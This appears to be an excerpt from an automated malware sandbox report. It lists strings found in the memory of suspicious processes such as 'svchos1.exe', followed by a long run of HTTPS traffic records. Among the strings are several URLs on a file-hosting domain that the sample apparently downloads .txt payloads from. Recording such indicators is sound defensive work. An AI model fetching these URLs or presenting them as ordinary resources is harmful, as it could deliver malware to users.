Source: powershell.exe, 0000000C.00000002.1352415793.0000000005B27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1351765606.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.000000000101F000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178006793.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2548834267.00000000057C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2695630715.0000000001004000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178006793.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2548834267.00000000057C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.trust-provider.cn0
Source: powershell.exe, 0000000F.00000002.1343511003.0000000005046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1343755156.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1343511003.0000000005046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1343755156.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1343511003.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1406113199.00000000045C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1343755156.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1343511003.0000000005046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000F.00000002.1343511003.0000000005046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1365243609.0000000007F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000C.00000002.1343755156.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1343511003.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1406113199.00000000045C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000F.00000002.1351765606.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1351765606.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1351765606.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: [System Process]12.exe, 00000000.00000003.1265015941.000000000095F000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1265094563.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2695630715.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/
Source: svchos1.exe	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
Source: [System Process]12.exe, 00000000.00000003.1558805674.00000000029B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt;
Source: [System Process]12.exe, 00000000.00000003.1801836328.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1837465779.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1855439284.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1769036710.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1725744891.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1581115762.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1813805390.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1689967566.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1635137474.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txtdit
Source: svchos1.exe	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt
Source: [System Process]12.exe, 00000000.00000003.1802215383.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1726022189.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1690201355.00000000029BB000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1580964128.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1769316883.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1837854470.00000000029BD000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1855954054.00000000029BE000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1814359621.00000000029BE000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1636235157.00000000029BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt;
Source: [System Process]12.exe, 00000009.00000003.2695630715.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txtM
Source: [System Process]12.exe, 00000000.00000003.1801836328.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1837465779.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1855439284.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1769036710.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1725744891.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1581115762.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1813805390.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1689967566.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1635137474.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txtVi
Source: [System Process]12.exe, 00000009.00000003.2695630715.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txtd
Source: [System Process]12.exe, 00000000.00000003.1801836328.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1837465779.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1855439284.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1769036710.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1725744891.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1581115762.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1813805390.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1689967566.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1635137474.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txtqh
Source: svchos1.exe	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txt
Source: [System Process]12.exe, 00000000.00000003.1265094563.0000000000996000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1265015941.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txt7V
Source: [System Process]12.exe, 00000000.00000000.1063449375.000000000086C000.00000002.00000001.01000000.00000003.sdmp, [System Process]12.exe, 00000009.00000000.1277633035.000000000086C000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txtDownload
Source: [System Process]12.exe, 00000000.00000003.1265094563.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txtLMEM
Source: [System Process]12.exe, 00000000.00000003.1265015941.000000000095F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txtNNC:
Source: [System Process]12.exe, 00000000.00000003.1265094563.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txtqh
Source: powershell.exe, 0000000F.00000002.1343511003.0000000005046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: [System Process]12.exe, 00000000.00000003.1855439284.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1813805390.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1725744891.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1689967566.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1265094563.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1801836328.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1837465779.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1769036710.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1635137474.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1581115762.00000000009B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 0000000C.00000002.1352415793.0000000005B27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1351765606.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178006793.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2548834267.00000000057C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: svchos1.exe	String found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 50439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 50405 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50429 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 50369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50339
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
